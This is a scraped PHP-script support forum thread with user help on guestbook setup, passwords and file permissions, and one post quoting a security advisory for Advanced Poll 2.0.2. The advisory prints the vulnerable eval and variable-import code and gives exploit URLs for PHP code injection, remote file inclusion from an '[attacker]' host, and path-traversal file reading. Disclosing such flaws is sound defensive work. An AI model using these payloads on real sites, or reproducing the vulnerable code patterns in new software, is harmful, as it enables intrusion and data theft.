| Author |
Message |
|
|
Hi Trevor,
Take a look here
|
 |
|
|
Seems the Exploit was posible thru a bug in the php version you use.
So if your hosting company has the latest version than the bug doesn't work.
|
|
|
|
You will need PHPadmin for this.
To reset you password:
Select the Guestbook database
Now choose on the right side of screen select SQL
Now insert in the Data Entry Field the following lines:
And click "GO"
This will reset your account to:
User name: test
Password: 123
Also read this topic: http://proxy2.de/forum/viewtopic.php?t=3037
|
|
|
|
www.starelement.com works for me.
And yes both the guestbook tutorials are made by me 
If it's correct they should be the same.
Yep they are both version 1.4 and that's the latest version.
|
|
|
|
Login as an admin and use:
To check your environmental variables, click here.
and then look if "file_uploads" is on
This means you can upload files if its off you can't.
|
|
|
|
Auron , JTD and Brianr
Thanks guy's and good luck with rest.
@ Auron: I love the new design you made
|
|
|
|
Thanks Yumiko. 
But I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz. 
|
|
|
|
I’m stopping my support and development for the guestbook, because I have some other obligations and priorities.
So you will not find any help anymore at Procaz.
|
|
|
|
Use the search button:
http://proxy2.de/forum/viewtopic.php?t=2934&highlight=reset+password
|
|
|
|
The link doesn't work and when I go too the root (http://www.z-gal.com/)
I get this error:
Warning: main(./conf_global.php): failed to open stream: No such file or directory in /home/z-gal/public_html/index.php on line 93
|
|
|
|
|
Frontpage doesn't support php
|
|
|
|
It seems there is also a bug Advanced Poll 2.0.2
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
comments.php :
------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");
for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------
booth.php, png.php :
---------------------------------------------------------------
<?php
$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}
if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------
poll_ssi.php, popup.php :
----------------------
include "./booth.php";
----------------------
admin/common.inc.php :
---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------
In the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
:
------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);
require "./common.inc.php";
[...]
------------------------------------
misc/info.php :
-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------
Exploits :
°°°°°°°°
- if magic_quotes_gpc=OFF :
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
or with a POST form or cookies.
- This will only work if register_globals=OFF (this is not an error...) :
http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php
- This will work if register_globals=OFF OR ON :
http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.
The same hole can be found, in the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view
- http://[target]/misc/info.php will show the phpinfo().
Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .
Credits :
°°°°°°°°
frog-mn
http://www.phpsecure.info
|
|
|
|
Hi,
Amber222 is right, most of the time ths is a chmod question.
You shouldn't set Memorial to 777, because you give everybody write permission to your root directory.
Here is how I have the chmod setup:
admin 755
doc 755
img 755
lang 755
lib 755
public 777
templates 777
tmp 777
|
|
|
|
|
Messages such as 'Thankyou for stopping by my site...' are contained in the file english.php in the lang sub-directory.
|
|
|
|
|
No kown exploits yet (as far as I know).
|
|
|
|
![[Search]](/forum/templates/html/images/icon_mini_search.gif){kind=icon}
![[Hottest Topics]](/forum/templates/html/images/icon_mini_recentTopics.gif){kind=icon}
![[Members]](/forum/templates/html/images/icon_mini_members.gif){kind=icon}
![[FAQ]](/forum/templates/html/images/icon_mini_faq.gif){kind=icon}
![[Register]](/forum/templates/html/images/icon_mini_register.gif){kind=icon}
Register![[Login]](/forum/templates/html/images/icon_mini_login.gif){kind=icon}
Login